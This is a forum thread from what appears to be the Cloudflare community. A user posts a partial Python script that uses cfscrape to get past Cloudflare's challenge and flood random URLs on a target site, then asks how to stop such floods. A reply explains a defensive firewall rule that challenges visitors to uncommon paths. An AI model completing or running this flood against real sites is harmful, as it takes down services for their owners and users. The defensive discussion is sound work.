CloudFlare Bypassed?

I took some time and wrote a very simple script that can down a website using cloudflare. I see this as something cloudflare should work on for free users, since nobody has money to spend on rate limiting or cloudflare pro.

# pip install cfscrape
# Python2
import cfscrape
import random
s = cfscrape.create_scraper()
while 1:
    x = str(random.random())

It spams post requests or any requests really to a random URI on the target website, flooding the web server. As a DoS, it cannot harm the web server, but with multiple devices, I’ve noticed web server timeouts.
Could someone please reply and inform me what could be done to stop this without the usage of rate limiting?

Cloudflare does allow 10k free rate limiting actions

The power of Firewall Rules is available on all plans.

You can, for instance, Challenge (reCaptcha) any visitor not coming after the main URLs of your front end.

You can easily do this if your site is small and doesn’t have many URLs.

For larger sites, I’d first visit Google Analytics, to run a report to see which of the site URLs are the most visited in a given period, say a year or 6 mos.

Once you have the list of URLs, you create a Firewall Rule that will look like this:

(not and eq "" and not http.request.uri.path in {"/url-1/" "/url-2/" "/url-3/" ... "/url-n/"})

That in essence would make Cloudflare servers respond to what would (mostly) be 404s by stopping the bots at the edge. It would also challenge legit visitors coming after less visited URLs, so you should set the time for bypassing the Challenge after one is successfully passed accordingly.

I have one such rule for each of my sites in stand-by mode, to be enabled only if needed.

Likewise, you can create a similar rule for random query strings, but that would require a bit of digging into the site’s specifics, to avoid challenging legit behavior that depend on QS, such as purchases and in-site searching.

1 Like

This topic was automatically closed after 30 days. New replies are no longer allowed.